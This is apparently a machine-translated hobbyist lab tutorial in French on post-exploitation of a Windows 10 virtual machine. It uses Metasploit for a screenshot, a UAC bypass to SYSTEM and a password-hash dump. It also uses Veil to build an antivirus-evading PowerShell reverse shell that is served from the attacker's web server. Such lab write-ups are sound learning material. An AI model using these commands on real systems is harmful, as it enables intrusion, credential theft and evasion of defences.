Suite, premier piratage de Windows 10
introduction
C'est le 15e jour du calendrier de l'Avent de PRO Co., Ltd. Désolé pour la publication tardive ...! !! !!
Cet article est une suite de «Premier piratage de Windows 10». Je vais essayer de vous faire penser "Est-ce possible de faire ça?" Même si vous le regardez seul, mais si vous voulez l'essayer vous-même, Article précédent / items / 1d035b0413ab60674ccb) Veuillez également l'inclure.
Choses à faire
La dernière fois, j'ai essayé d'attaquer et de contrôler à distance l'environnement cible (Windows10) créé par VM à partir de l'environnement d'attaque (Kali Linux) à l'aide d'un outil appelé Metasploit Framework (ci-après, Metasploit). Cette fois, faisons l'expérience de certaines des choses à faire après avoir pénétré dans le terminal cible.
- Faire une capture d'écran --Acquisition de l'autorité SYSTEM
- Obtenez le hachage du mot de passe Windows
- Évitez la détection de virus antivirus
Ici, on suppose que la session Meterpreter a été établie à l'avance (Article précédent "Permettre au terminal cible d'être contrôlé depuis le terminal d'attaque" / 1d035b0413ab60674ccb #% E6% 94% BB% E6% 92% 83% E7% AB% AF% E6% 9C% AB% E3% 81% 8B% E3% 82% 89% E3% 82% BF% E3% 83% BC% E3% 82% B2% E3% 83% 83% E3% 83% 88% E7% AB% AF% E6% 9C% AB% E3% 82% 92% E5% 88% B6% E5% BE% A1% Voir E3% 81% A7% E3% 81% 8D% E3% 82% 8B% E3% 82% 88% E3% 81% 86% E3% 81% AB% E3% 81% 99% E3% 82% 8B)) ..
Mise en garde!
Cet article ne vise pas à recommander un accès non autorisé. ** Ne faites jamais ce que vous introduisez dans l'environnement de quelqu'un d'autre **
Environnement de vérification
Identique à Dernière fois.
- OS hôte: macOS 10.15.2 Bêta
- OS invité
- Terminal d'attaque: Kali Linux 5.3.0-kali2-amd64
- Terminal cible: Windows10
- Logiciel de virtualisation: VirtualBox 6.0.14 r133895 (Qt5.6.3)
| Terminal | adresse IP |
|---|---|
| Kali Linux (terminal d'attaque) | 10.0.0.2 |
| Windows10 (terminal cible) | 10.0.0.102 |
Prendre une capture d'écran
Entrez la commande suivante pour filmer l'écran actuellement affiché sur le terminal cible.
meterpreter > screenshot
Screenshot saved to: /root/ImgBawmm.jpeg
Le cadre rouge est une capture d'écran du terminal cible.
Obtenir l'autorité SYSTEM
Si vous ne disposez pas de privilèges d'administrateur, diverses opérations seront limitées, vous devrez donc élever vos privilèges.
Tentative d'élévation de l'autorité avec la commande getsystem (échec)
Vérifiez les autorisations actuelles.
meterpreter > getuid
Server username: DESKTOP-4V3PT8F\arakawa
Meterpreter fournit une commande getsystem qui tente d'élever aux privilèges SYSTEM, mais échoue car l'utilisateur intrus a de faibles privilèges.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
Essayez un module qui contourne la fonctionnalité UAC
La commande getsystem a échoué car elle a été bloquée par la fonctionnalité de contrôle de compte d'utilisateur Windows (UAC) et nous recherchons un module pour la contourner.
Tout d'abord, ramenez l'invite Meterpreter en arrière-plan et revenez à l'invite msf.
meterpreter > background
[*] Backgrounding session 1..
msf5 exploit(multi/handler) >
Vérifiez la session connectée
msf5 exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-4V3PT8F\arakawa @ DESKTOP-4V3PT8F 10.0.0.2:4444 -> 10.0.0.102:50763 (10.0.0.102)
Recherchez les modules avec le mot-clé "bypassuac".
msf5 exploit(multi/handler) > search bypassuac
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass
1 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
2 exploit/windows/local/bypassuac_dotnet_profiler 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via dot net profiler)
3 exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
4 exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key)
5 exploit/windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection)
6 exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
7 exploit/windows/local/bypassuac_sdclt 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)
8 exploit/windows/local/bypassuac_silentcleanup 2019-02-24 excellent No Windows Escalate UAC Protection Bypass (Via SilentCleanup)
9 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack)
10 exploit/windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
11 exploit/windows/local/bypassuac_windows_store_filesys 2019-08-22 manual Yes Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)
12 exploit/windows/local/bypassuac_windows_store_reg 2019-02-19 manual Yes Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry
Utilisez les modules suivants pour envoyer Exploit via des sessions établies.
8 exploit/windows/local/bypassuac_silentcleanup 2019-02-24 excellent No Windows Escalate UAC Protection Bypass (Via SilentCleanup)
msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_silentcleanup <----Utiliser le module d'entrée
msf5 exploit(windows/local/bypassuac_silentcleanup) > show targets <----contribution
Exploit targets:
Id Name
-- ----
0 Microsoft Windows
msf5 exploit(windows/local/bypassuac_silentcleanup) > set TARGET 0 <----Ensemble cible d'entrée
TARGET => 0
msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 1 <----Ensemble de sessions d'entrée
SESSION => 1
msf5 exploit(windows/local/bypassuac_silentcleanup) > set payload windows/x64/meterpreter/reverse_tcp <----Définir la charge utile cible d'entrée
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 10.0.0.2 <----Entrée: définir l'hôte de secours
LHOST => 10.0.0.2
msf5 exploit(windows/local/bypassuac_silentcleanup) > show options <----Confirmation des paramètres d'entrée
Module options (exploit/windows/local/bypassuac_silentcleanup):
Name Current Setting Required Description
---- --------------- -------- -----------
PSH_PATH %WINDIR%\System32\WindowsPowershell\v1.0\powershell.exe yes The path to the Powershell binary.
SESSION 1 yes The session to run this module on.
SLEEPTIME 0 no The time (ms) to sleep before running SilentCleanup
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.0.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Windows
msf5 exploit(windows/local/bypassuac_silentcleanup) > exploit <----Exécution d'entrée
[*] Started reverse TCP handler on 10.0.0.2:4444
[+] Part of Administrators group! Continuing...
[*] Sending stage (206403 bytes) to 10.0.0.102
[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.102:50983) at 2019-12-15 18:17:57 +0900
meterpreter > <--Réussite lorsque l'invite meterpreter est renvoyée
Essayez de rehausser l'autorité avec getsystem (succès)
meterpreter > getuid
Server username: DESKTOP-4V3PT8F\arakawa <--Utilisateur normal avant exécution
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM <--Autorité SYSTÈME
Vous disposez désormais des privilèges SYSTEM.
Obtenez le hachage du mot de passe
Une des choses que vous pouvez faire après avoir obtenu les privilèges SYSTEM est d'obtenir un hachage de mot de passe. Le hachage obtenu est principalement utilisé pour l'analyse des mots de passe de Windows. De plus, l'analyse des mots de passe ne sera pas traitée cette fois.
S'il s'agit d'un compte local, l'authentification de connexion est gérée dans la base de données SAM (fichier "C: \ Windows \ System32 \ config \ SAM") et le mot de passe est enregistré au format de hachage.
Dans Metasploit, vous pouvez obtenir le hachage du mot de passe avec la commande run hashdump, mais vous obtiendrez une erreur si vous ne disposez pas des privilèges SYSTEM.
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY d1584c448032fe34d1e8e158d04561ed...
/usr/share/metasploit-framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
<Hachage du mot de passe>
Il est affiché dans la partie
Évitez les antivirus
Établissez une session Meterpreter en évitant la détection de virus par un antivirus.
Créez une charge utile qui évite l'antivirus dans Veil
Installez Veil Framework
Veil Framwwork (Veil) Un groupe d'outils qui génèrent des charges utiles qui échappent à l'antivirus.
Veil n'est pas disponible sur Kali Linux, donc installez-le séparément.
root@kali:~# apt install veil-evasion
Lancer Veil
Exécutez la commande suivante avec une connexion GUI à Kali. En cours de route, il vous sera demandé si vous souhaitez installer les dépendances, alors sélectionnez "s" (installer en mode silencieux).
root@kali:~# veil
===============================================================================
Veil | [Version]: 3.1.12
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Main Menu
2 tools loaded
Available Tools:
1) Evasion
2) Ordnance
Available Commands:
exit Completely exit Veil
info Information on a specific tool
list List available tools
options Show Veil configuration
update Update Veil
use Use a specific tool
Veil>:
- Si vous l'exécutez en étant connecté à SSH, la boîte de dialogue échouera et une erreur se produira lors de l'installation de Wine.
[!] ERROR #2-3: Can't find the WINE profile for Ruby v1.8.7 (/var/lib/veil/wine//drive_c/Ruby187/bin/ruby.exe). Run: /usr/share/veil/config/setup.sh --force --silent
Créer une charge utile avec Veil
Mettre à jour Veil
Les technologies de détection de virus et d'évasion sont constamment mises à jour, alors tenez-les à jour pour augmenter le taux de réussite de l'évasion autant que possible.
Veil>: update
Hit:1 http://ftp.jaist.ac.jp/pub/Linux/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
veil is already the newest version (3.1.12-0kali1).
veil set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 203 not upgraded.
Veil has checked for updates, press enter to continue
Sélectionnez un outil
Deux outils, Evasion et Ordnance, ont été chargés, mais je choisis Evasion car il évite la détection de virus.
Veil>: use 1
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Veil-Evasion Menu
41 payloads loaded
Available Commands:
back Go to Veil's main menu
checkvt Check VirusTotal.com against generated hashes
clean Remove generated artifacts
exit Completely exit Veil
info Information on a specific payload
list List available payloads
use Use a specific payload
Sélectionnez une charge utile
Sélectionnez "powershell / meterpreter / rev_tcp.py" qui est le shell inversé pour Windows dans la liste.
Veil/Evasion>: list <--contribution
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[*] Available Payloads:
1) autoit/shellcode_inject/flat.py
2) auxiliary/coldwar_wrapper.py
<Omis>
22) powershell/meterpreter/rev_tcp.py
<Omis>
41) ruby/shellcode_inject/flat.py
Veil/Evasion>: use 22 <--contribution
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Payload Information:
Name: Pure PowerShell Reverse TCP Stager
Language: powershell
Rating: Excellent
Description: pure windows/meterpreter/reverse_tcp stager, no
shellcode
Payload: powershell/meterpreter/rev_tcp selected
Required Options:
Name Value Description
---- ----- -----------
BADMACS FALSE Checks for known bad mac addresses
DOMAIN X Optional: Required internal domain
HOSTNAME X Optional: Required system hostname
LHOST IP of the Metasploit handler
LPORT 4444 Port of the Metasploit handler
MINBROWSERS FALSE Minimum of 2 browsers
MINPROCESSES X Minimum number of processes running
MINRAM FALSE Require a minimum of 3 gigs of RAM
PROCESSORS X Optional: Minimum number of processors
SLEEP X Optional: Sleep "Y" seconds, check if accelerated
USERNAME X Optional: The required user account
USERPROMPT FALSE Window pops up prior to payload
UTCCHECK FALSE Check that system isn't using UTC time zone
VIRTUALPROC FALSE Check for known VM processes
Available Commands:
back Go back to Veil-Evasion
exit Completely exit Veil
generate Generate the payload
options Show the shellcode's options
set Set shellcode option
[powershell/meterpreter/rev_tcp>>]: set LHOST 10.0.0.2 <--Entrée Spécifiez le terminal d'attaque comme destination de connexion
[powershell/meterpreter/rev_tcp>>]: options <--Confirmation des paramètres d'entrée
<Omis>
Création de brochures
Créez avec la commande generate.
[powershell/meterpreter/rev_tcp>>]: generate <--contribution
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[>] Please enter the base name for output files (default is payload): evil3 <--Spécifiez le nom de la charge utile d'entrée
<Omis>
Quittez Veil avec la commande exit et copiez la charge utile créée sur votre bureau.
Veil/Evasion>: exit
root@kali:~# cp /var/lib/veil/output/source/evil3.bat /root/Desktop
Évitez la protection en temps réel de Windows Defender
Dans la charge utile créée par Metasploit, si vous ne désactivez pas la protection en temps réel de Windows, elle sera détectée au moment du téléchargement et de l'exécution et vous ne pourrez pas établir de session, mais la charge utile créée ici pourra être téléchargée et exécutée sans être détectée. (En décembre 2009).
Autoriser le téléchargement de la charge utile en externe
Placez la charge utile créée dans un dossier qui peut être téléchargé de l'extérieur et mettez-la en état de veille du shell inversé avec meterpreter. Spécifiez la charge utile comme "windows / meterpreter / reverse_tcp".
root@kali:~# cp /root/Desktop/evil3.bat /var/www/html/share/
root@kali:~# service apache2 restart
root@kali:~# msfconsole
<Abréviation>
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.0.0.2
LHOST => 10.0.0.2
msf5 exploit(multi/handler) > exploit
Téléchargez la charge utile
Téléchargez evil3.bat sur le périphérique cible. Il n'est pas détecté comme un virus à ce stade.
Exécutez la charge utile
evil3.bat Double-cliquez pour afficher un écran d'avertissement, mais cliquez sur Exécuter dans les informations détaillées.
S'il y a une réaction du côté Kali et que l'invite Meterpreter est renvoyée, cela signifie que la session a été établie sans être détectée. Si vous ne recevez pas de message, il se peut qu'il soit bloqué par une fonction de votre logiciel de sécurité.
finalement
Cette fois, j'ai eu du mal à obtenir l'autorité SYSTEM, car la session n'a pas été établie correctement et voile n'a pas démarré. Fondamentalement, il est préparé pour que vous puissiez tout faire avec une seule commande, et je pensais que c'était facile, mais si vous ne comprenez pas bien le contenu, je pense qu'il est devenu difficile de gérer les problèmes. C'est effrayant que même une telle personne puisse le faire relativement facilement.
référence
[IPUSIRON "Comment créer un laboratoire de piratage: apprentissage de l'expérience de piratage dans un environnement virtuel" Shosuisha (amazon)](https://www.amazon.co.jp/%E3%83%8F%E3%83%83%E3%82 % AD% E3% 83% B3% E3% 82% B0% E3% 83% BB% E3% 83% A9% E3% 83% 9C% E3% 81% AE% E3% 81% A4% E3% 81% 8F % E3% 82% 8A% E3% 81% 8B% E3% 81% 9F-% E4% BB% AE% E6% 83% B3% E7% 92% B0% E5% A2% 83% E3% 81% AB% E3% 81% 8A% E3% 81% 91% E3% 82% 8B% E3% 83% 8F% E3% 83% 83% E3% 82% AB% E3% 83% BC% E4% BD% 93% E9% A8% 93% E5% AD% A6% E7% BF% 92-IPUSIRON-ebook / dp / B07JJKLZNW) FAQ du site d'assistance «Comment créer un laboratoire de piratage» pour «l'apprentissage de l'expérience de piratage dans un environnement virtuel»